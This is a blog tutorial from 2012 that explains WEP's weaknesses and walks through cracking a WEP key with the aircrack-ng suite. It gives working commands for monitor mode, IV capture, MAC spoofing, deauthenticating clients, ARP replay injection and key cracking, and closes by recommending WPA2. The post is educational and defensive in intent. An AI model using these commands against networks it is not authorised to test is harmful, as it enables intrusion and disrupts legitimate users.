Write to us: Click Here

Saturday, 10 March 2012

How To Crack WiFi WEP With Packet Injection


Intro

By now most people have wireless networks at home. A lot of them may have experienced leechers or have leeched themselves through an open network. An easy way to prevent that from happening is to encrypt your network traffic. One of these methods is by use of WEP or Wired Equivalent Privacy. I’m going to talk about why you shouldn’t use WEP and how easy it is to crack.


Background

WEP was designed to provide similar privacy that a user would have if they were wired to their network. The way it works is it uses either a 64-bit or 128-bit encryption key and follows the RC4 symmetric encryption standard. 24 bits of the key are used for an IV which is intended to encrypt each packet with a different key. The remaining bits are for your PSK; limiting your key strength to 40 or 104 bits.

How it works

The transmitting station appends the PSK to the IV to create the seed. The seed is pushed through a PRNG to generate a stream of random data. The random data is then passed to a function to perform a binary logic XOR against the plain text to create the cipher text. The cipher text is then appended to the IV with an indicator bit stating that is is an encrypted packet and is sent through the airway. The receiving station looks for the encrypted bit and extracts the IV if found. The IV is attached to the PSK and passed through the PRNG algorithm to obtain the same stream of random data the transmitting station generated. This stream of data is then passed through the same XOR function to reverse the encryption and leave you with the plain text.

What’s the problem?

The problem is that for efficiency an IV isn’t very large. This creates a problem of running out of unique keys effectively exposing the PSK. A busy AP will run out of unique keys in a few hours and an attacker can be sitting and collecting data the whole time, or they can take a more aggressive approach and have all the information they need in a few minutes by use of packet injection.
The other downfall is that WEP only encrypts the payload and not the entire packet. This leaves the header information in plain text giving away information that can be very useful for an attacker.

How is it done?

There are tools available to crack the encryption on an IV collection. It’s as easy as sitting around listening to network traffic and then running a program once you have enough data. That’s all there is to a passive attack.
Sitting around and waiting for a network to give you enough data by itself can take hours or even days. The process can be sped up to a matter of minutes by injecting the network with fake packets. This is done by setting your wireless card to monitor mode and pretending to be an actual user of the network trying to establish a connection.
The tool I am going to use in this example is AirCrack. It is an entire suite designed for testing and breaking through protections on a wireless network. I don’t suggest attempting to use this tool in a Windows environment. The tools and driver support isn’t as readily available. I do recommend to Windows users to take a look at the Backtrack Linux live environment. It can be run off of portable media such as a DVD or flash drive.


Set your wireless card into monitor mode.

You need to have a wireless card that supports monitor mode. Monitor mode allows you to listen to all packets instead of only packets intended for you. This is done by creating a virtual interface to act as a second wireless adapter using the same hardware. The tool to automate this is airmon-ng. Please substitute your wireless interface accordingly in the following steps.

Take the interface down:

# ifconfig wlan0 down
Bring the interface back up in monitor mode:
# airmon-ng start wlan0

Test injection capabilities:

# aireplay-ng -9 -e ESSID -a 00:11:22:33:44:55 mon0
  • -9 tells aireplay to test injection
  • -e is the ESSID of the AP
  • -a is the BSSID (MAC Address) of the AP
  • mon0 is my interface in monitor mode

Start grabbing IVs:

# airodump-ng --bssid 00:11:22:33:44:55 -w ESSID mon0
  • –bssid is the MAC Address of the AP
  • -w is the prefix for the capture files, I normally use the ESSID
That’s all you need to do for a passive attack. Now we’ll speed up the process.

Authenticate with the AP:

One of these will work better than the other depending on your scenario. Choose what works best for you.
# aireplay-ng -1 0 -e ESSID -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0
# aireplay-ng -1 6000 -o 1 -q 10 -e ESSID -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0
If neither of those work MAC filtering may be configured and you will need to spoof your MAC to an existing client. Then you can either move on to the next step masquerading while the client is still up, or sent a deauthenticate packet and try the previous again / wait for the client to reauthenticate and send ARP packets.
# aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0

Inject your packets:

Finally, you’re associated and not getting sent deauthentication packets. As long as you are associated the AP will respond to your packets. If you lose authentication just perform what you had to do in the previous step. Now we’re going to start repeating ARP packets.
# aireplay-ng -3 -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0

Crack your data:

Once you get about 20,000 you can try to see if you can find the key. You can perform this step while still collecting IVs. First we’ll try to crack based on a 64-bit key. Replace ESSID with whatever you put for the -w parameter for airdump previously.
# aircrack-ng -n 64 ESSID*.cap
If that doesn’t work we’ll try for a 128-bit key.
# aircrack-ng ESSID*.cap

Conclusion

The process to break through WEP can be completly automated and done in a very short period of time. Make sure you secure your network with something more secure. At the time of this article I use WPA2 with a RADIUS backend.
If you are trying this at home and can’t crack it right away don’t get discouraged. It once took me over 2 million IVs to break into my home network. It’s all a matter of luck when it comes down to aircrack-ng step.

0 Responses to “How To Crack WiFi WEP With Packet Injection”

Post a Comment

If you're having issues. Please leave an email address I can contact you on -
I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question.

Hyperlinks are not allowed, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!

Thanks for reading,
Admin

All Rights Reserved Walk With-[Geeks]- by w4r-b0y
Special Thanx to Team Indishell and The Almighty Google